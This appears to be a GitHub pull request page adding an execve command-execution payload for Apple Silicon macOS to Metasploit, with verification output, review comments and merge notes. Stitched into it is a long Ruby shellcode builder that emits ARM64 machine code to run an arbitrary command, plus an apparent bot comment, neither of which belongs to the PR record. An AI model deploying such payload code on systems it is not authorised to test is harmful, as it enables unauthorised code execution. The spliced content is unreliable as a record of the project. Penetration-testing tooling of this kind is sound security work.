
Add osx aarch64 exec payload #18646

Merged

Conversation

@AlanFoster AlanFoster commented Dec 30, 2023

Adds a new osx/aarch64/exec payload that can execute arbitrary user provided commands via an execve system call on M1/M2/M3 Apple laptops.

Verification

  1. On an M1 machine
  2. Generate a payload:
msf6 payload(osx/aarch64/exec) > generate -f macho cmd=/bin/bash -o shell
[*] Writing 50072 bytes to shell...
  3. chmod and execute:
➜  metasploit-framework git:(add-osx-aarch64-exec-payload) ✗ chmod +x ./shell 
➜  metasploit-framework git:(add-osx-aarch64-exec-payload) ✗ ./shell 

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$

With arguments:

msf6 payload(osx/aarch64/exec) > generate -f macho cmd="/bin/bash -c 'echo 123 && echo abc && whoami && echo 🔥'" -o shell
[*] Writing 50072 bytes to shell...

Executing:

$ ./shell
123
abc
user
🔥
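The payload described above places the command on the stack and hands it to execve. The Ruby below is an added example written for this page, not the Metasploit module's own code (its `create_aarch64_string_in_stack` helper is not shown here, and the module name `Aarch64ExecStack`, `build` and `to_bytes` are this example's names): it splits the command into argv entries with `Shellwords`, emits the A64 instructions that write the argv pointer array and its strings below the current sp, and finishes with the execve system call. The instruction encodings are the standard A64 ones; the stack layout and the macOS arm64 calling convention assumed here (syscall number in x16, execve = 59, `svc #0x80`) are this example's own assumptions rather than facts taken from the PR.

```ruby
require 'shellwords'

# Added example, not the Metasploit module's code: builds aarch64 machine code
# that lays an execve()-ready argv array and its strings onto the stack, then
# invokes the execve system call. Register number 31 is sp as a base/operand
# and xzr as a store source.
module Aarch64ExecStack
  SP  = 31
  XZR = 31
  module_function

  # MOVZ/MOVK Xd, #imm16, LSL #(16*hw)
  def movz(rd, imm16, hw); 0xD2800000 | (hw << 21) | (imm16 << 5) | rd; end
  def movk(rd, imm16, hw); 0xF2800000 | (hw << 21) | (imm16 << 5) | rd; end
  # STR/LDR Xt, [Xn, #off] with an unsigned offset scaled by 8
  def str_x(rt, rn, off); 0xF9000000 | ((off / 8) << 10) | (rn << 5) | rt; end
  def ldr_x(rt, rn, off); 0xF9400000 | ((off / 8) << 10) | (rn << 5) | rt; end
  # ADD/SUB Xd, Xn, #imm12 (Rn == 31 selects sp, not xzr)
  def add_imm(rd, rn, imm); 0x91000000 | (imm << 10) | (rn << 5) | rd; end
  def sub_imm(rd, rn, imm); 0xD1000000 | (imm << 10) | (rn << 5) | rd; end
  # ORR Xd, Xn, Xm (mov x2, xzr is orr x2, xzr, xzr)
  def orr_reg(rd, rn, rm); 0xAA000000 | (rm << 16) | (rn << 5) | rd; end
  def svc(imm16); 0xD4000001 | (imm16 << 5); end

  # Load a full 64-bit immediate into rd: one movz plus three movk, no branches,
  # no data embedded after the code.
  def load_u64(rd, value)
    (0..3).map do |hw|
      half = (value >> (16 * hw)) & 0xFFFF
      hw.zero? ? movz(rd, half, hw) : movk(rd, half, hw)
    end
  end

  # Returns [instructions, layout]. Frame layout (offsets from the new sp):
  #   0 .. 8*n       argv[0..n-1] followed by a NULL pointer
  #   ptr_area ..    each argument as a NUL-terminated, 8-byte padded string
  def build(cmd)
    args = Shellwords.split(cmd)
    raise ArgumentError, 'empty command' if args.empty?
    ptr_area = (args.size + 1) * 8
    blob = String.new(encoding: Encoding::BINARY)
    offsets = args.map do |arg|
      off = ptr_area + blob.bytesize
      blob << arg.b << "\0"
      blob << "\0" * ((8 - blob.bytesize % 8) % 8)   # keep every chunk 8-byte aligned
      off
    end
    frame = ptr_area + blob.bytesize
    frame += 16 - frame % 16 if frame % 16 != 0      # sp must stay 16-byte aligned
    raise ArgumentError, 'command too long for a 12-bit immediate' if frame >= 4096

    insns = [sub_imm(SP, SP, frame)]
    # 1. write the string bytes, eight at a time, above the pointer array
    blob.unpack('Q<*').each_with_index do |word, i|
      insns.concat(load_u64(1, word))
      insns << str_x(1, SP, ptr_area + 8 * i)
    end
    # 2. fill argv with absolute pointers computed from sp at run time
    offsets.each_with_index do |off, i|
      insns << add_imm(1, SP, off) << str_x(1, SP, 8 * i)
    end
    insns << str_x(XZR, SP, 8 * args.size)           # argv[n] = NULL
    # 3. execve(argv[0], argv, NULL); x16 = 59 / svc #0x80 assumed for macOS arm64
    insns << ldr_x(0, SP, 0) << add_imm(1, SP, 0) << orr_reg(2, XZR, XZR)
    insns << movz(16, 59, 0) << svc(0x80)
    [insns, { frame: frame, argv_offsets: offsets }]
  end

  # Little-endian 32-bit words, i.e. the raw shellcode bytes.
  def to_bytes(insns); insns.pack('L<*'); end
end

if $PROGRAM_NAME == __FILE__
  insns, layout = Aarch64ExecStack.build("/bin/bash -c 'echo abcdef1234'")
  puts "frame=#{layout[:frame]} argv offsets=#{layout[:argv_offsets].inspect}"
  puts insns.map { |i| format('%08x', i) }.join(' ')
end
```

Every chunk costs five instructions (four immediate loads and one store) regardless of its value, so the code has no data pointer to relocate and stays position independent; the unsigned-offset addressing caps the frame at 4095 bytes, which the `build` method checks rather than silently truncating the immediate. Feeding `to_bytes` output to a disassembler is the quickest way to confirm the encodings before trying them on a machine.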

@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch 4 times, most recently from 3bd0c2b to 4a6096a on December 30, 2023 17:52
modules/payloads/singles/osx/aarch64/exec.rb (outdated, resolved)
Comment on lines 117 to 118
end.join("\n")
push_string += "\n"

Suggested change
end.join("\n")
push_string += "\n"
end
push_string = push_string.join("\n") + "\n"
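Review bot: the suggested form is only equivalent to the original if the line above the hunk (not shown) assigns the result of the enclosing `do ... end` block to `push_string`; otherwise `push_string.join("\n")` would operate on whatever `push_string` held before the block. Worth confirming that assignment is present before accepting the suggestion.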

Invoking a method on the end keyword, even if correct, is a tad confusing when used outside of string interpolation, I think.

modules/payloads/singles/osx/aarch64/exec.rb (outdated, resolved)

describe '#create_aarch64_string_in_stack' do
context 'when the string is calc.exe' do
it 'genearates the required stack' do

Suggested change
it 'genearates the required stack' do
it 'generates the required stack' do

end

context 'when the string is /bin/bash -c "echo abcdef1234"' do
it 'genearates the required stack' do

Suggested change
it 'genearates the required stack' do
it 'generates the required stack' do

modules/payloads/singles/osx/aarch64/exec.rb (outdated, resolved)
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch from 4a6096a to 92edf01 on January 2, 2024 14:32
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch from 92edf01 to 0848909 on May 23, 2024 10:07
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch from 0848909 to 16bfa00 on May 31, 2024 16:50
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch from 16bfa00 to dbeeade on May 31, 2024 16:51
@adfoster-r7 adfoster-r7 marked this pull request as ready for review May 31, 2024 17:03
@cgranleese-r7 cgranleese-r7 merged commit f2902b3 into rapid7:master May 31, 2024
53 of 54 checks passed
@cgranleese-r7 cgranleese-r7 self-assigned this May 31, 2024
@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label May 31, 2024
@cgranleese-r7

Release Notes

Add osx aarch64 exec payload.
